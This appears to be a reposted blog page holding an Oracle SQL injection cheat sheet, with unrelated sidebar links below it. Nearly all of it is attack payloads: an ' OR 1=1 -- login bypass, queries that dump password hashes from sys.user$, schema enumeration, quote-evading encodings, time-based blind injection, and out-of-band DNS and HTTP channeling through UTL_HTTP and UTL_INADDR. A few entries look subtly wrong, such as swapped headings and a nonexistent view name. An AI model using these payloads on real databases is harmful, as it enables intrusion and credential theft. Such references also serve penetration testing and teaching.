• SQL Injection 字典


    Oracle

    Default Databases

    SYSTEM Available in all versions
    SYSAUX Available in all versions

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    -- SQL comment


    Example:

        • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

    Testing Version

    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

    Notes:

    • All SELECT statements in Oracle must contain a table.
    • dual is a dummy table which can be used for testing.

    Database Credentials

    SELECT username FROM all_users; Available on all versions
    SELECT name, password from sys.user$; Privileged, <= 10g
    SELECT name, spare4 from sys.user$; Privileged, <= 11g

    Database Names

    Current Database

    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance
    SELECT global_name FROM global_name
    SELECT SYS.DATABASE_NAME FROM DUAL

    User Databases

    SELECT DISTINCT owner FROM all_tables;

    Server Hostname

    SELECT host_name FROM v$instance; (Privileged)
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
    SELECT UTL_INADDR.get_host_address FROM dual;

    Tables and Columns

    Retrieving Tables

    SELECT table_name FROM all_tables;

    Retrieving Columns

    SELECT column_name FROM all_tab_columns;

    Find Tables from Column Name

    SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

    Find Columns From Table Name

    SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

    Retrieving Multiple Tables at once

    SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

    Avoiding the use of quotations

    Unlike other RDBMS, Oracle allows table/column names to be encoded.

    SELECT 0x09120911091 FROM dual; Hex Encoding.
    SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

    String Concatenation

    SELECT 'a'||'d'||'mi'||'n' FROM dual;

    Conditional Statements

    SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

    Timing

    Time Delay

    SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

    Heavy Time Delays

    AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

    Privileges

    SELECT privilege FROM session_privs;
    SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

    Out Of Band Channeling

    DNS Requests

    SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
    SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

    Password Cracking

    A Metasploit module for JTR can be found here.

  • 相关阅读:
    高频交易程序竟然是饿罗斯人开发的?
    系统功能在用户测试阶段被推翻
    去新华书店有感
    金桔
    结香
    金钟花
    金丝桃
    箬竹
    香茶菜
    水果兰
  • 原文地址:https://www.cnblogs.com/shengxinking/p/3854266.html
Copyright © 2020-2023  润新知